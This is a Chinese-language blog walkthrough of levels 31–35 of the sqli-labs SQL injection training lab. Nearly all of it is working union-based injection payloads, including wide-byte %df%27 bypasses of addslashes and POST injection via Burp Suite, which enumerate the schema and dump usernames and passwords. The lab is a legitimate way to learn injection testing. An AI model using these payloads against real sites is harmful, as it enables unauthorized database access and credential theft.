首页 > 数据库 >sqli-labs靶场通关攻略(31-35关)

sqli-labs靶场通关攻略(31-35关)

时间:2024-08-26 19:21:34浏览次数:12  
标签:group name 31 35 labs table id concat schema

第31关( ") 闭合)

查数据库

?id=") union select 1,2,database() --+

查表

?id=") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

查列

?id=") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

查数据

?id= ") union select 1,2,group_concat(username,0x7e,password) from users --+

第32关(宽字节注入)

查数据库

?id=-1%df%27%20union%20select%201,database(),3%20--+

查表

?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

查列

?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+

查数据

?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

第33关(宽字节注入)

查数据库

?id=-1%df%27%20union%20select%201,database(),3%20--+

查表

?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

查列

?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+

查数据

?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

第34关( post 宽字节)

本关使用addslashes函数对于账户和密码都进行转义

使用Burpsuite抓包,在登录的时候抓,然后发送到repeater

查数据库

%df' union select 1,database()#

查表

%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

查列

%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#

查数据

%df%27 union select 1,group_concat(password,username) from users#

第35关(数字闭合直接注入)

查数据库

?id=-1 union select 1,2,database()#

查表

?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()#

查列

?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273#

查数据

?id=-1 union select 1,2,group_concat(username,password)from users #

标签:group,name,31,35,labs,table,id,concat,schema
From: https://blog.csdn.net/Nai_zui_jiang/article/details/141569073

相关文章

  • 【日记】这个月花了好多钱(1317 字)
    正文这几天都好热。热到人不想动,只想睡觉。今天写文章发现自己有个很显著的特点,就是在有个框架之后,具体细节完全没有预设。我只能像马尔可夫链一样,形成一个比较窄的窗口,接着这个窗口里的情节往下写,否则我就会宕机,写不出来。整个故事情节看起来也就比较散。马尔可夫链拯......
  • 网站提示431 Request Header Fields Too Large:请求头字段太大怎么办
    当遇到“431RequestHeaderFieldsTooLarge”错误时,这意味着客户端发送的请求头中的一个或多个字段超过了服务器允许的最大长度。这种情况通常发生在请求头中的某个字段(如Cookie或Authorization)过长时。解决方案检查请求头确认请求头中的字段是否过长。特别注意Cook......
  • [oeasy]python031_[趣味拓展]unix起源_Ken_Tompson_Ritchie_multics
    [趣味拓展]unix起源_Ken_Tompson_Ritchie_multics......
  • sqli-labs靶场通关攻略(20-40)
    第二十一关登陆后显示如下图界面,感觉和cookie注入有些相似进行抓包,发现cookie被编码返回来查看源代码,发现这里被base64编码我们将抓到的包发至重放器,在cookie字段写入查询代码并改为base64编码发送请求即可得到数据库名剩余操作大家自行查询第二十二关登陆后显示......
  • 题解:SP3109 STRLCP - Longest Common Prefix
    三倍经验:UVA11996JewelMagicP4036[JSOI2008]火星人题意维护一个字符串\(S\),支持以下操作:\(Q\i\j\):输出\(\operatorname{LCP}(S[i\dotsl],S[j\dotsl])\)\(R\i\char\):用\(char\)替换\(S\)的第\(i\)个字符\(I\i\char\):在\(S\)的第\(i\)......
  • 题解:AT_abc354_g [ABC354G] Select Strings
    题目分析题意给定\(n\)个字符串,要求从中选出若干个组成一个集合,且集合中每个字符串都互不包含。求集合中字符串的权值的和的最大值。分析首先很容易想到用KMP判两个串是否存在包含关系。考虑建图,将不能同时存在于一个集合中的串的节点相连。然后发现只需求出这个图的最......
  • 题解:CF235C Cyclical Quest
    题意给定一个主串\(S\)和\(n\)个询问串,求每个询问串的所有循环同构在主串中出现的次数总和。分析后缀自动机好题。循环同构的过程可以看作从该串的头部删除一个字符,并在尾部加入一个字符。在后缀自动机上,跳parent树的过程就相当于删除头部的若干个字符。所以我们可......
  • C++竞赛初阶L1-14-第六单元-数组(31~33课)543: T456473 年龄与疾病
    题目内容某医院进行一项研究,想知道某项疾病是否与年龄有关。因此对以往的诊断记录进行整理,统计0-18、19-35、36-60、61及以上这四个年龄段的患者人数占总患者人数的比例。输入格式输入共 2 行。第一行包含一个整数 N(0<n≤100),表示总患者人数。第二行包含 N 个......
  • 题解:P10358 [PA2024] Obrazy
    题解:P10358[PA2024]Obrazy题目传送门即当最小的画框都不可能覆盖整个矩形墙面时,输出−1。[PA2024]Obrazy题目背景PA20243C题目描述题目译自PA2024Runda3Obrazy,感谢Macaronlin提供翻译给定尺寸为$h\timesw$的矩形墙面,以及$n$种尺寸的正方形画框,每种尺寸......
  • 36635982 升级
    [oracle@prdb1936635982]$/u01/app/oem/middleware/OMSPatcher/omspatcherapply.-spb_patchJDKupdateloglocation::/u01/app/oem/middleware/cfgtoollogs/omspatcher/SPB_PATCH/jdk_update_Sat_Aug_24_20_52_13_2024.logtar:./binary_patches/jdk/linux64/jd......